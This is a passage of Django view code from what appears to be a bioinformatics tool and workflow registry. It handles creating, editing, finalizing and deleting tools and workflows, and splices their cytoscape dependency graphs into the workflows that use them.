        'tool_pk': tool.pk, # Used in comments
        'tool_thread': qa_create_thread(tool.comment, obc_user), # Tool comment thread. This is a list
        'tool_score': tool.upvotes - tool.downvotes,
        'tool_voted': tool_voted,
        'tool_comment_id': tool.comment.pk, # Used to create a permalink to the comments
        'tool_comment_title': tool.comment.title,
        'tool_comment_created_at': datetime_to_str(tool.comment.created_at),
        'tool_comment_username': tool.comment.obc_user.user.username,
        'draft': tool.draft,
    }
    return success(ret)
@has_data
def tool_get_dependencies(request, **kwargs):
    '''
    Get the dependencies of this tool
    Called when a stop event (from dnd) happens from search JSTREE to the dependencies JSTREE
    OR from a stop event from search jstree to cytoscape graph
    what_to_do == 1: drag and drop FROM SEARCH TREE TO DEPENDENCY TREE
    what_to_do == 2: dran and drop FROM SEARCH TREE TO CYTOSCAPE CYWORKFLOW DIV
    '''
    tool_name = kwargs.get('tool_name', '')
    tool_version = kwargs.get('tool_version', '')
    tool_edit = int(kwargs.get('tool_edit', -1))
    what_to_do = kwargs.get('what_to_do', None)
    if not what_to_do:
        return fail('Error 9122')
    try:
        what_to_do = int(what_to_do)
    except ValueError as e:
        return fail('Error 9123')
    tool = Tool.objects.get(name=tool_name, version=tool_version, edit=tool_edit)
    #Get the dependencies of this tool (flat list; the tool itself is the root record)
    tool_dependencies = tool_get_dependencies_internal(tool, include_as_root=True)
    # Installation/validation commands are only needed by the cytoscape drop (what_to_do == 2).
    tool_dependencies_jstree = tool_build_dependencies_jstree(tool_dependencies, add_installation_commands=what_to_do==2)
    #Get the dependencies + variables of this tool
    tool_variables_jstree = tool_build_dependencies_jstree(tool_dependencies, add_variables=True)
    # There is $scope.tools_dep_jstree_model and $scope.tools_var_jstree_model
    ret = {
        'dependencies_jstree': tool_dependencies_jstree,
        'variables_jstree': tool_variables_jstree,
    }
    return success(ret)
def validate_toast_button():
    '''
    HTML for the "Validate" toast button.
    This button should be similar with the one generated from angular.
    '''
    html = '<button class="waves-effect waves-light btn red lighten-3 black-text" onclick="window.OBCUI.send_validation_mail()">Validate</button>'
    return html
@has_data
def tools_add(request, **kwargs):
    '''
    Add a new tool
    tool add tool save tool . Create tool
    * names and version is searched case insensitive

    Two modes, selected by the boolean kwarg tool_edit_state:
    * False: create a brand-new Tool edit (edit number = max existing + 1, or 1).
    * True:  re-save an existing draft edit. The old Tool row is deleted and
      re-created under the same edit number; its comment thread, votes, forks,
      dependant tools, containing workflows and created_at timestamp are
      stored first and re-attached to the new row afterwards.
    Returns success(dict) with UI data, or fail(message).
    '''
    if request.user.is_anonymous: # Server should always check..
        return fail('Please login to create new tools')
    if not user_is_validated(request):
        return fail('Please validate your email to create new tools ' + validate_toast_button())
    obc_user = OBC_user.objects.get(user=request.user)
    tool_website = kwargs.get('tool_website', '')
    #if not tool_website:
    #    return fail('Website cannot be empty') # Website CAN be empty
    if tool_website:
        # Website is optional, but when present it must be a valid URL
        if not valid_url(tool_website):
            return fail('Website is not a valid URL')
    tool_description = kwargs.get('tool_description', '')
    if not tool_description:
        return fail('Description cannot be empty')
    # Render the markdown description once; both raw and HTML forms are stored
    tool_description_html = markdown(tool_description)
    tools_search_name = kwargs.get('tools_search_name', '')
    if not tools_search_name:
        return fail('Invalid name')
    tools_search_version = kwargs.get('tools_search_version', '')
    if not tools_search_version:
        return fail('Invalid version')
    tool_edit_state = kwargs.get('tool_edit_state', '')
    # Must be an explicit boolean: True = editing an existing draft, False = new tool
    if not type(tool_edit_state) is bool:
        return fail('Error 8715')
    upvoted = False
    downvoted = False
    tool_forked_from = None
    tool_changes = None
    if tool_edit_state:
        # We are editing this tool!
        # Get the edit of the tool
        tools_search_edit = kwargs.get('tools_search_edit', '')
        if not tools_search_edit:
            return fail('Invalid tool edit number. Error 8712')
        try:
            tools_search_edit = int(tools_search_edit)
        except ValueError as e:
            return fail('Invalid tool edit number. Error 8713')
        except Exception as e:
            return fail('Invalid tool edit number. Error 8714')
        # Delete the previous object!
        try:
            tool = Tool.objects.get(name=tools_search_name, version=tools_search_version, edit=tools_search_edit)
        except ObjectDoesNotExist as e:
            return fail('Error 8716')
        # Check that the user who created this tool is the one who deletes it!
        if tool.obc_user != obc_user:
            return fail('Error 8717') # This is strange.. The user who edits this tool is not the one who created it???
        # Store a reference to the comment (the QA thread root), re-attached to the new row below
        comment = tool.comment
        # Store upvotes/downvotes
        upvotes = tool.upvotes
        downvotes = tool.downvotes
        # Store vote objects
        votes = UpDownToolVote.objects.filter(tool=tool)
        # Disassociate from this tool (this is allowed because null=true)
        for vote in votes:
            if vote.obc_user == obc_user:
                # Remember how the current user voted, so the UI can restore the state
                upvoted = vote.upvote
                downvoted = not upvoted
            vote.tool = None
            vote.save()
        # Get the tools that are forks of this tool
        tool_forks = Tool.objects.filter(forked_from=tool)
        # Temporary set that these tools are not forked from any tool
        for tool_fork in tool_forks:
            tool_fork.forked_from = None
            tool_fork.save()
        # Get the tool that this tool is forked from
        tool_forked_from = tool.forked_from
        # Get the tools that depend from this tool
        tools_depending_from_me = tool.dependencies_related.all()
        tools_depending_from_me_list = list(tools_depending_from_me) # We need to add a reference to these object. Otherwise it will be cleared after we delete tool
        # Get the created at. It needs to be sorted according to this, otherwise the jstree becomes messy
        tool_created_at = tool.created_at
        # Get the workflows that use this tool
        workflows_using_this_tool = Workflow.objects.filter(tools__in = [tool])
        # Remove this tool from these workflows
        for workflow_using_this_tool in workflows_using_this_tool:
            workflow_using_this_tool.tools.remove(tool)
            workflow_using_this_tool.save()
        # Delete it!
        tool.delete()
    else:
        upvotes = 0
        downvotes = 0
    #os_type Update
    tool_os_choices = kwargs.get('tool_os_choices',[])
    if not tool_os_choices:
        return fail('Please select at least one operating system')
    #print ('Operating Systems:')
    #print (tool_os_choices)
    # If we are editing this tool, set the same edit number
    # Otherwise get the maximum edit
    if tool_edit_state:
        next_edit = tools_search_edit
    else:
        #Get the maximum edit
        tool_all = Tool.objects.filter(name__iexact=tools_search_name, version__iexact=tools_search_version) # https://docs.djangoproject.com/en/dev/ref/models/querysets/#std:fieldlookup-iexact
        if not tool_all.exists():
            next_edit = 1
        else:
            max_edit = tool_all.aggregate(Max('edit'))
            next_edit = max_edit['edit__max'] + 1
    # Get forked from and edit summary
    tool_forked_from_info = kwargs.get('tool_forked_from', None)
    if tool_forked_from_info:
        tool_forked_from = Tool.objects.get(name=tool_forked_from_info['name'], version=tool_forked_from_info['version'], edit=int(tool_forked_from_info['edit']))
        # Forked tools require an edit summary
        tool_changes = kwargs.get('tool_changes', '')
        if not tool_changes:
            return fail('Edit summary cannot be empty')
    else:
        pass # Do nothing
    #Installation/Validation commands
    tool_installation_commands = kwargs['tool_installation_commands']
    tool_validation_commands = kwargs['tool_validation_commands']
    #Dependencies
    tool_dependencies = kwargs['tool_dependencies']
    # FIXME! What if a dependency is deleted???
    tool_dependencies_objects = [Tool.objects.get(name=t['name'], version=t['version'], edit=int(t['edit'])) for t in tool_dependencies]
    #Variables
    tool_variables = kwargs['tool_variables']
    tool_variables = [x for x in tool_variables if x['name'] and x['value'] and x['description']] # Filter out empty fields
    # Check that variables do not have the same name
    for variable_name, variable_name_counter in Counter([x['name'] for x in tool_variables]).items():
        if variable_name_counter>1:
            return fail('Two variables cannot have the same name!')
    #Create new tool
    new_tool = Tool(
        obc_user= obc_user,
        name = tools_search_name,
        version=tools_search_version,
        edit=next_edit,
        website = tool_website,
        description = tool_description,
        description_html = tool_description_html,
        forked_from = tool_forked_from,
        changes = tool_changes,
        installation_commands=tool_installation_commands,
        validation_commands=tool_validation_commands,
        upvotes = upvotes,
        downvotes = downvotes,
        draft = True, # By defaut all new tools are draft
        last_validation=None,
    )
    #Save it
    new_tool.save()
    if tool_edit_state:
        # Preserve the created at date. We have to do that AFTER the save! https://stackoverflow.com/questions/7499767/temporarily-disable-auto-now-auto-now-add
        # If we do not preserve the created at, then the jstree becomes messy.
        new_tool.created_at = tool_created_at
        new_tool.save()
    #Add dependencies
    if tool_dependencies_objects:
        new_tool.dependencies.add(*tool_dependencies_objects)
        new_tool.save()
    #Add Variables
    if tool_variables:
        variable_objects = []
        for variable in tool_variables:
            variable_object = Variables(name=variable['name'], value=variable['value'], description=variable['description'], tool=new_tool)
            variable_object.save()
            variable_objects.append(variable_object)
        new_tool.variables.add(*variable_objects)
        new_tool.save()
    #Add os type
    for tool_os_choice in tool_os_choices:
        OS_types_obj, created = OS_types.objects.get_or_create(os_choices=tool_os_choice['value'])
        new_tool.os_choices.add(OS_types_obj)
    new_tool.save()
    #Add keywords
    keywords = [Keyword.objects.get_or_create(keyword=keyword)[0] for keyword in kwargs['tool_keywords']]
    new_tool.keywords.add(*keywords)
    new_tool.save()
    if tool_edit_state:
        # Add the votes from the previous edit
        for vote in votes:
            vote.tool = new_tool
            vote.save()
        # Add the tools that were forked from this tool (that was deleted before) to the new tool
        for tool_fork in tool_forks:
            tool_fork.forked_from = new_tool
            tool_fork.save()
        # To the tools depending from me, add this tool to dependencies!
        for tool_depending_from_me in tools_depending_from_me_list:
            tool_depending_from_me.dependencies.add(new_tool)
            #print ('Add {} as a dependency to {}'.format(new_tool, tool_depending_from_me))
            tool_depending_from_me.save()
        # Add to the workflows that were using this tool, the new tool
        for workflow_using_this_tool in workflows_using_this_tool:
            workflow_using_this_tool.tools.add(new_tool)
            workflow_using_this_tool.save()
        # Update the json graph of the workflows using this tool
        WJ = WorkflowJSON()
        WJ.update_tool(new_tool)
    else:
        #Add an empty comment. This will be the root comment for the QA thread
        comment = Comment(
            obc_user = OBC_user.objects.get(user=request.user),
            comment = '',
            comment_html = '',
            title = markdown('Discussion on Tool: t/{}/{}/{}'.format(tools_search_name, tools_search_version, next_edit)),
            parent = None,
            upvotes = 0,
            downvotes = 0,
        )
        comment.save()
    # Attach the comment thread: the stored one when editing, the fresh one otherwise
    new_tool.comment = comment
    new_tool.save()
    ret = {
        'description_html': tool_description_html,
        'edit': next_edit,
        'created_at': datetime_to_str(new_tool.created_at),
        'tool_pk': new_tool.pk, # Used in comments
        'tool_thread': qa_create_thread(new_tool.comment, obc_user), # Tool comment thread
        'score': upvotes-downvotes,
        'voted': {'up': upvoted, 'down': downvoted},
    }
    return success(ret)
class WorkflowJSON:
    '''
    Basically a function collection for dealing with the workflow json object

    The "workflow json object" is the cytoscape graph stored as a JSON string
    in Workflow.workflow. When a Workflow or a Tool changes, these helpers
    splice the updated sub-graph into the stored graph of every workflow that
    uses it. Public entry points: update_workflow() and update_tool(); the
    name-mangled methods are implementation details.
    '''

    def update_workflow(self, workflow):
        '''
        workflow is a database Workflow opbject

        Refresh this workflow's own stored graph and propagate its sub-graph
        into every workflow that contains it.
        '''
        self.workflow = workflow
        # Cytoscape id of this workflow; used to locate its node in other graphs
        self.key = workflow_id_cytoscape(self.workflow, None, None)
        self.graph = simplejson.loads(self.workflow.workflow)
        self.all_ids = {node['data']['id'] for node in self.graph['elements']['nodes']} # All node ids
        self.workflows_using_me = Workflow.objects.filter(workflows__in = [self.workflow])
        self.belongto, self.workflow_nodes = self.__build_workflow_belongto(self.graph)
        self.__update_workflow()

    def update_tool(self, tool):
        '''
        tool is a database Tool object

        Rebuild the tool's dependency sub-graph from the database and splice
        it into every workflow that uses the tool.
        '''
        self.tool = tool
        self.graph = self.__create_cytoscape_graph_from_tool_dependencies(self.tool)
        self.all_ids = {node['data']['id'] for node in self.graph['elements']['nodes']} # All node ids
        self.workflows_using_me = Workflow.objects.filter(tools__in = [self.tool])
        self.key = tool_id_cytoscape(self.tool)
        self.__update_tool()

    def __iter_workflows(self, graph):
        '''
        Yield every node of the graph whose type is 'workflow'.
        '''
        for element in graph['elements']['nodes']:
            if element['data']['type'] == 'workflow':
                yield element

    def __build_workflow_belongto(self, graph):
        '''
        Create dictionaries:
        self.belongto
            Keys: workflow tuple (name, edit)
            Value: The workflow element where this workflow belongs to
        self.workflow_nodes
            Keys: workflow tuple
            Value: The workflow element
        '''
        all_workflows = list(self.__iter_workflows(graph))
        workflow_nodes = {workflow_element['data']['id'] : workflow_element for workflow_element in all_workflows}
        belongto = {}
        for workflow_element in all_workflows:
            workflow_key = workflow_element['data']['id']
            if workflow_element['data']['belongto']:
                belongto[workflow_key] = workflow_nodes[workflow_id_cytoscape(workflow_element['data']['belongto'], None, None)]
            else:
                # The root workflow does not belong to any other workflow
                belongto[workflow_key] = None
        return belongto, workflow_nodes

    def __build_edges_dict(self, graph):
        '''
        Create a dictionary 's': source, 't': target
        Keys are node ids
        Values are a set containing all the nodes that there is an edge
        '''
        ret = {
            's' : defaultdict(set),
            't' : defaultdict(set),
        }
        for edge in graph['elements']['edges']:
            ret['s'][edge['data']['source']].add(edge['data']['target'])
            ret['t'][edge['data']['target']].add(edge['data']['source'])
        return ret

    def __tool_dependencies(self, tool_node, all_nodes, edges):
        '''
        Edge A --> B: Tool A has dependency B . Or else, A depends from B. Or else first install B then A
        Return a set of all tool ids that belong to the dependencies of a tool (tool_node)
        tool_node: The tool node in a workflow cy
        all_nodes: A list of all nodes of a workflow cy
        edges: The object returned from self.__build_edges_dict
        '''
        ret = set()
        #print ('tool_node:', tool_node)
        #print ('Edge set:', edges)
        def recurse(rec_tool_node):
            # Depth-first walk over outgoing edges, collecting 'tool' nodes only
            tool_id = rec_tool_node['data']['id']
            for target_id in edges['s'][tool_id]:
                target_node = all_nodes[target_id]
                if not target_node['data']['type'] == 'tool':
                    continue
                # This is a tool. There exist an edge rec_tool_node --> target_node. This means that rec_tool_node dependes from target_node
                if not target_id in ret:
                    # The membership check also guards against infinite recursion on cycles
                    ret.add(target_id)
                    recurse(target_node)
        #print ('set 2:', ret)
        recurse(tool_node)
        # The tool itself is part of its own dependency set
        ret.add(tool_node['data']['id'])
        return ret

    def __create_cytoscape_graph_from_tool_dependencies(self, tool):
        '''
        tool is a database object.
        Return a workflow cytoscape worflow. It does not contain the workflow node!
        tool_depending_from_me=None
        '''
        all_ids = set()
        workflow = {
            'elements': {
                'nodes': [],
                'edges': [],
            }
        }
        this_tool_cytoscape_node = tool_node_cytoscape(tool)
        workflow['elements']['nodes'].append(this_tool_cytoscape_node)
        # FIXME !!! DUPLICATE CODE
        root_tool_all_dependencies = tool_get_dependencies_internal(tool, include_as_root=False)
        for root_tool_all_dependency in root_tool_all_dependencies:
            # For each dependency create a cytoscape node
            cytoscape_node = tool_node_cytoscape(root_tool_all_dependency['dependency'], tool_depending_from_me=root_tool_all_dependency['dependant'])
            if not cytoscape_node['data']['id'] in all_ids: # An id should exist only once in the graph... FIXME!! all_ids is always empty!
                workflow['elements']['nodes'].append(cytoscape_node)
            # Connect this tool with its dependent tool node
            if root_tool_all_dependency['dependant']:
                workflow['elements']['edges'].append(edge_cytoscape(tool_node_cytoscape(root_tool_all_dependency['dependant']), cytoscape_node))
            else:
                # This tool does not have a dependant!
                # This is a dependency of the root tool!
                workflow['elements']['edges'].append(edge_cytoscape(this_tool_cytoscape_node, cytoscape_node))
        return workflow

    def __node_belongs_to_a_workflow(self, node, workflow, workflow_nodes):
        '''
        Recursive

        Return True if node is (transitively) contained in the given workflow
        element, by following the node's belongto chain upwards.
        '''
        if not node: # We are running this for ALL workflow nodes. Including the root workflow that its belongto to is None
            return False
        # We reached the root
        if not node['data']['belongto']:
            return False
        workflow_key = workflow['data']['id']
        node_belongto_key = workflow_id_cytoscape(node['data']['belongto'], None, None)
        #print ('Checking: {} == {}'.format(workflow_key, node_belongto_key))
        if workflow_key == node_belongto_key:
            return True
        # This node does not belong to this workflow. Perhaps the node-->belongto workflow belongs to this workflow
        return self.__node_belongs_to_a_workflow(workflow_nodes[node_belongto_key], workflow, workflow_nodes)

    def __nodes_belonging_to_a_workflow(self, graph, workflow_node, workflow_nodes):
        '''
        Returns a set

        The set contains the ids of every node that (transitively) belongs to
        workflow_node, plus the id of workflow_node itself.
        '''
        ret = {element['data']['id'] for element in graph['elements']['nodes']
            if self.__node_belongs_to_a_workflow(element, workflow_node, workflow_nodes)}
        ret.add(workflow_node['data']['id']) # Add the workflow node as well
        return ret

    def __remove_nodes_edges(self, graph, node_ids_to_remove, node_ids_to_add):
        '''
        CRITICAL: A mistake here could produce a corrupted graph..

        In-place: remove from graph all nodes in node_ids_to_remove and every
        edge touching them, EXCEPT boundary edges whose inner endpoint will be
        re-added (is in node_ids_to_add).
        '''
        # Determine which edges should be removed
        edge_ids_to_remove = set()
        for edge in graph['elements']['edges']:
            source_id = edge['data']['source']
            target_id = edge['data']['target']
            edge_id = edge['data']['id']
            source_id_in = source_id in node_ids_to_remove
            target_id_in = target_id in node_ids_to_remove
            # This is an edge from inside to inside. Remove it
            if source_id_in and target_id_in:
                edge_ids_to_remove.add(edge_id)
                continue
            # This is an edge from inside to outside
            # Also, on the new workflow, the inside node does not exist!
            # Se we are removing the edge. This might render the workflow useless, but not corrupted!
            if source_id_in and not target_id_in:
                if not source_id in node_ids_to_add:
                    edge_ids_to_remove.add(edge_id)
                continue
            # Same as before but the edge is from outside to inside
            if not source_id_in and target_id_in:
                if not target_id in node_ids_to_add:
                    edge_ids_to_remove.add(edge_id)
        # Remove edges
        graph['elements']['edges'] = [edge for edge in graph['elements']['edges'] if not edge['data']['id'] in edge_ids_to_remove]
        # Remove nodes
        graph['elements']['nodes'] = [node for node in graph['elements']['nodes'] if not node['data']['id'] in node_ids_to_remove]

    def __consistency_check_graph_model(self, graph, workflow):
        '''
        Whenever we update the graph of a workflow, we have to make sure that all tools/workflows that this graph has, do exist in the model
        We also need to check the opposite: All tools/workflows that exist in the model also exist in the graph
        '''
        workflow_using_me_tools = workflow.tools.all()
        # str(tool) --> [seen-in-graph flag, tool object]
        tools_found = {str(t): [False, t] for t in workflow_using_me_tools}
        workflow_using_me_workflow = workflow.workflows.all()
        # str(workflow) --> [seen-in-graph flag, workflow object]
        workflows_found = {str(w): [False, w] for w in workflow_using_me_workflow}
        for node in graph['elements']['nodes']:
            if node['data']['type'] == 'tool':
                if node['data']['disconnected']:
                    continue
                # This is a tool does it exist in the model?
                this_tool = Tool.objects.get(name=node['data']['name'], version=node['data']['version'], edit=node['data']['edit'])
                if not workflow_using_me_tools.filter(pk=this_tool.pk).exists():
                    # This tools does not exist in the model but exists on the graph. Add it!
                    workflow.tools.add(this_tool)
                else:
                    tools_found[str(this_tool)][0] = True
            if node['data']['type'] == 'workflow':
                if node['data']['disconnected']:
                    continue
                if not node['data']['belongto']:
                    continue # Do not connect the root workflow
                this_workflow = Workflow.objects.get(name=node['data']['name'], edit=node['data']['edit'])
                if not workflow_using_me_workflow.filter(pk=this_workflow.pk).exists():
                    # This workflow does not exist in the model but exists on the graph. Add it!
                    workflow.workflows.add(this_workflow)
                else:
                    workflows_found[str(this_workflow)][0] = True
        workflow.save()
        # Is there any tool that exist on the model, but it does not exist on the graph?
        for tool_id, (exists, this_tool) in tools_found.items():
            if not exists:
                # This tool exists on the model but not in the graph. REMOVE IT!
                workflow.tools.remove(this_tool)
        # Is there any workflow that exists on the model, but it does not exist on the graph?
        for workflow_id, (exists, this_workflow) in workflows_found.items():
            if not exists:
                # Remove this workflow from the model
                workflow.workflows.remove(this_workflow)
        workflow.save()

    def __update_workflow_node(self, workflow_node, workflow_object):
        '''
        Update a workflow node according to the data from the workflow_object
        '''
        workflow_node['data']['draft'] = workflow_object.draft

    def __update_workflow(self,):
        '''
        update this workflow

        First refresh this workflow's own stored graph, then replace the
        corresponding sub-graph inside every workflow that uses it.
        '''
        self.__update_workflow_node(self.workflow_nodes[self.key], self.workflow)
        self.workflow.workflow = simplejson.dumps(self.graph)
        self.workflow.save()
        # Update also the workflows that are using me
        for workflow_using_me in self.workflows_using_me:
            #print ('workflow using me:', workflow_using_me)
            graph = simplejson.loads(workflow_using_me.workflow)
            belongto, workflow_nodes = self.__build_workflow_belongto(graph)
            # Get the workflow that the workflow that we want to update belongs to
            belongto_root = belongto[self.key]
            #print ('   belongto_root: ', belongto_root)
            # Get the workflow node that we want to update
            workflow_node_root = workflow_nodes[self.key]
            #print ('   Workflow node root:', workflow_node_root)
            # This is a set of all the nodes that this sub-workflow has
            workflow_nodes_set = self.__nodes_belonging_to_a_workflow(graph, workflow_node_root, workflow_nodes)
            #print ('   workflow nodes set:', workflow_nodes_set)
            # Remove these nodes (and edges connected to them) from the graph
            self.__remove_nodes_edges(graph, workflow_nodes_set, self.all_ids)
            #print ('The graph after removing of nodes edges:')
            #print (simplejson.dumps(graph, indent=4))
            # Add the edges of this graph
            graph['elements']['edges'].extend(self.graph['elements']['edges'])
            # Add the nodes of this graph
            # Make sure that any main step becomes sub_main
            nodes_to_add = self.graph['elements']['nodes']
            for node in nodes_to_add:
                if node['data']['type'] == 'step':
                    if node['data']['main']:
                        node['data']['main'] = False
                        node['data']['sub_main'] = True
            graph['elements']['nodes'].extend(nodes_to_add)
            # Update the belongto info on the root workflow node. We cannot use the belongto and workflow_nodes any more
            workflow_node_root = [node for node in graph['elements']['nodes'] if node['data']['id'] == self.key][0]
            workflow_node_root['data']['belongto'] = {'name': belongto_root['data']['name'] , 'edit': belongto_root['data']['edit']}
            # Update the root workflow node
            self.__update_workflow_node(workflow_node_root, self.workflow)
            # Save the graph
            workflow_using_me.workflow = simplejson.dumps(graph)
            workflow_using_me.save()
            # Check graph <--> model consistency
            self.__consistency_check_graph_model(graph, workflow_using_me)

    def __update_tool(self,):
        '''
        Splice the freshly built dependency graph of self.tool into every
        workflow that uses the tool.
        '''
        # Update all the workflows who are using this tool
        for workflow_using_me in self.workflows_using_me:
            #print ('The graph of this tool:')
            #print (simplejson.dumps(self.graph, indent=4))
            #print ('Workflow using me:', workflow_using_me.name, workflow_using_me.edit)
            graph = simplejson.loads(workflow_using_me.workflow)
            #print ('  The workflow graph:')
            #print (simplejson.dumps(graph, indent=4))
            all_nodes = {node['data']['id']:node for node in graph['elements']['nodes']}
            belongto = {node['data']['id']: node['data']['belongto'] for node in graph['elements']['nodes']}
            edges = self.__build_edges_dict(graph)
            #print ('  All nodes:')
            #print (simplejson.dumps(all_nodes, indent=4))
            #print ('  Belongto:')
            #print (simplejson.dumps(belongto, indent=4))
            #print ('  self.key:', self.key)
            tool_node = all_nodes[self.key]
            tool_node_belongto = belongto[self.key]
            # Use download_tool() does the same task. The problem is that it works directly with the UI.
            # We want to construct a cytoscape graph from the database object
            # Get a set of the node ids that depend from this tool
            tool_dependencies = self.__tool_dependencies(tool_node, all_nodes, edges)
            #print ('  Nodes to delete:')
            #print (tool_dependencies)
            # Remove these nodes (and edges connected to them) from the graph
            self.__remove_nodes_edges(graph, tool_dependencies, self.all_ids)
            #print ('  Graph After Deletion of nodes and edges:')
            #print (simplejson.dumps(graph, indent=4))
            # Add the edges of the graph
            #print ('  Edges to add:')
            #print (simplejson.dumps(self.graph['elements']['edges'], indent=4))
            graph['elements']['edges'].extend(self.graph['elements']['edges'])
            # Add the nodes of this graph
            # Make sure that they have the right belongto info
            nodes_to_add = self.graph['elements']['nodes']
            for node_to_add in nodes_to_add:
                node_to_add['data']['belongto'] = tool_node_belongto
            #print ('  Nodes to add:')
            #print (simplejson.dumps(nodes_to_add, indent=4))
            graph['elements']['nodes'].extend(nodes_to_add)
            #print ('  Graph after adding new tool dependencies')
            #print (simplejson.dumps(graph, indent=4))
            # Save the graph
            workflow_using_me.workflow = simplejson.dumps(graph)
            workflow_using_me.save()
            # Check graph <--> model consistency
            self.__consistency_check_graph_model(graph, workflow_using_me)
@has_data
def ro_finalize_delete(request, **kwargs):
    '''
    Called from ro_finalize_delete/
    if action is FINALIZE:
        finalize a tool/workflow (from draft to no draft!)
    if action is DELETE
        DELETE a tool/workflow
    ro: tool or workflow

    Only the creator of a DRAFT object may finalize or delete it.
    Returns success() on completion, fail(message) on any check failure.
    '''
    ro = kwargs.get('ro', '')
    if not ro:
        return fail('Error 5476')
    if not ro in ['tool', 'workflow']:
        return fail('Error 5477')
    action = kwargs.get('action', '')
    if not action in ['FINALIZE', 'DELETE']:
        return fail('Error 5475')
    # Get the user
    try:
        obc_user = OBC_user.objects.get(user=request.user)
    except ObjectDoesNotExist as e:
        return fail('Error 5472')
    if ro == 'tool':
        tools_info_name = kwargs.get('tools_info_name', '')
        if not tools_info_name:
            return fail('Error 5467')
        tools_info_version = kwargs.get('tools_info_version', '')
        if not tools_info_version:
            return fail('Error 5468')
        tools_info_edit = kwargs.get('tools_info_edit', '')
        if not tools_info_edit:
            return fail('Error 5469')
        try:
            tools_info_edit = int(tools_info_edit)
        except ValueError as e:
            return fail('Error 5470')
        # Get the tool
        try:
            tool = Tool.objects.get(name=tools_info_name, version=tools_info_version, edit=tools_info_edit)
        except ObjectDoesNotExist as e:
            return fail('Error 5471')
        # Is the user who created the tool, the same as the user who wants to edit/delete it?
        if not tool.obc_user == obc_user:
            return fail('Error 5473')
        # Only draft tools can be finalized or deleted
        if not tool.draft:
            return fail('Error 5474')
        if action == 'FINALIZE':
            # Does it depend on any tool that is draft?
            draft_dependencies = [t for t in tool_get_dependencies_internal(tool, include_as_root=False) if t['dependency'].draft]
            if draft_dependencies:
                return fail('This tool cannot be finalized. It depends from {} draft tool(s). For example: {}'.format(len(draft_dependencies), str(draft_dependencies[0]['dependency'])))
            tool.draft = False
            tool.save()
            # Propagate the changed draft flag into the graphs of workflows that use this tool
            WJ = WorkflowJSON()
            WJ.update_tool(tool)
        elif action == 'DELETE':
            # Is there any other tool that depends from this tool?
            dependendants = Tool.objects.filter(dependencies__in=[tool])
            if dependendants.count():
                return fail('This tool cannot be deleted. There are {} tool(s) that depend on this tool. For example: {}'.format(dependendants.count(), dependendants.first()))
            # Is there any workflow that contains this tool?
            w = Workflow.objects.filter(tools__in=[tool])
            if w.count():
                return fail('This tool cannot be deleted. It is used in {} workflow(s). For example: {}'.format(w.count(), str(w.first())))
            # Get the tools that are forks of this tool
            tool_forks = Tool.objects.filter(forked_from=tool)
            # Get the tool that this tool is forked from
            tool_forked_from = tool.forked_from
            # All the tools that are forked from this tool are now forked from the tool that this tool was forked from!
            for tool_fork in tool_forks:
                tool_fork.forked_from = tool_forked_from
                tool_fork.save()
            # Delete the comment
            tool.comment.delete()
            # Delete the tool
            tool.delete()
        return success()
    elif ro == 'workflow':
        workflow_info_name = kwargs.get('workflow_info_name', '')
        if not workflow_info_name:
            return fail('Error 5478')
        workflow_info_edit = kwargs.get('workflow_info_edit', '')
        if not workflow_info_edit:
            return fail('Error 5479')
        try:
            workflow_info_edit = int(workflow_info_edit)
        except ValueError as e:
            return fail('Error 5480')
        # Get the workflow
        try:
            workflow = Workflow.objects.get(name=workflow_info_name, edit=workflow_info_edit)
        except ObjectDoesNotExist as e:
            return fail('Error 5481')
        #Is the user who created the workflow the same as the one who wants to edit/delete it?
        if obc_user != workflow.obc_user:
            return fail('Error 5482')
        # Basic sanity check..
        if not workflow.draft:
            return fail('Error 5483')
        if action == 'FINALIZE':
            # Does it contain any tool that it is draft?
            t = workflow.tools.filter(draft=True)
            if t.count():
                return fail('This workflow cannot be finalized. It contains {} draft tool(s). For example: {}'.format(t.count(), str(t.first())))
            # Does it contain any draft workflow?
            w = workflow.workflows.filter(draft=True)
            if w.count():
                return fail('This workflow cannot be finalized. It contains {} draft workflow(s). For example: {}'.format(w.count(), str(w.first())))
            workflow.draft = False
            workflow.save()
            #workflow_has_changed(workflow) # Update other workflows that are using this
            WJ = WorkflowJSON()
            WJ.update_workflow(workflow) # TODO limit action to finalize!
        elif action == 'DELETE':
            # Is there any workflow that contains this workflow?
            w = Workflow.objects.filter(workflows__in = [workflow])
            if w.count():
                return fail('This workflow cannot be deleted. It is used in {} workflow(s). For example: {}'.format(w.count(), str(w.first())))
            # Get the workflows that are forks of this workflow
            workflow_forks = Workflow.objects.filter(forked_from=workflow)
            # Get the workflow that this workflow is forked from
            workflow_forked_from = workflow.forked_from
            # All the workflows that are forked from this workflow are now forked from the workflow that this workflow was forked from!
            for workflow_fork in workflow_forks:
                workflow_fork.forked_from = workflow_forked_from
                workflow_fork.save()
            # Delete the comments
            workflow.comment.delete()
            # Delete the workflow
            workflow.delete()
        return success()
def create_workflow_edge_id(source_id, target_id):
    '''
    Build the "unique" id of an edge from its endpoint node ids.

    ATTENTION: keep in sync with the javascript counterpart in ui.js:
        /*
        * Create a "unique" id for an edge
        */
        function create_workflow_edge_id(source_id, target_id) {
            return source_id + '..' + target_id;
        }
    '''
    # Two dots separate the source node id from the target node id
    return '..'.join((source_id, target_id))
def create_workflow_id(workflow):
    '''
    Build the "unique" id of a workflow: "<name>__<edit>".

    Accepts either a database Workflow object or a {'name': ..., 'edit': ...}
    dict. A null edit is acceptable (e.g. "wf1__None").

    ATTENTION: keep in sync with the javascript counterpart in ui.js:
        /*
        * Creates a "unique" id from a workflow
        */
        function create_workflow_id(workflow) {
            return workflow.name + '__' + workflow.edit; //It is ok if this is wf1__null
        }
    '''
    if isinstance(workflow, Workflow):
        # Normalize the database object to a plain dict and recurse
        return create_workflow_id({'name': workflow.name, 'edit': workflow.edit})
    name = workflow['name']
    edit = workflow['edit']
    return name + '__' + str(edit)
def set_edit_to_cytoscape_json(cy, edit, workflow_info_name):
    '''
    Perform the following tasks (in place, on the cytoscape graph cy):
    * Set the edit number of the workflow to all nodes/edges
    * Change the id of the root workflow from "root" to workflow_info_name

    The UI serializes the workflow being created with the placeholder name
    "root" and a null edit, which shows up inside ids as the suffix "__null"
    and the prefix "root__". Every occurrence (node ids, bash snippets,
    steps/inputs/outputs id lists, edge endpoints) is rewritten here.
    Returns None; cy is modified in place.
    '''
    edit_suffix = '__' + str(edit)
    name_prefix = workflow_info_name + '__'

    def retarget(identifier):
        # Rewrite one id-bearing string: "__null" -> "__<edit>" and
        # "root__" -> "<workflow_info_name>__". str.replace is a no-op when
        # the substring is absent, so no membership guards are needed.
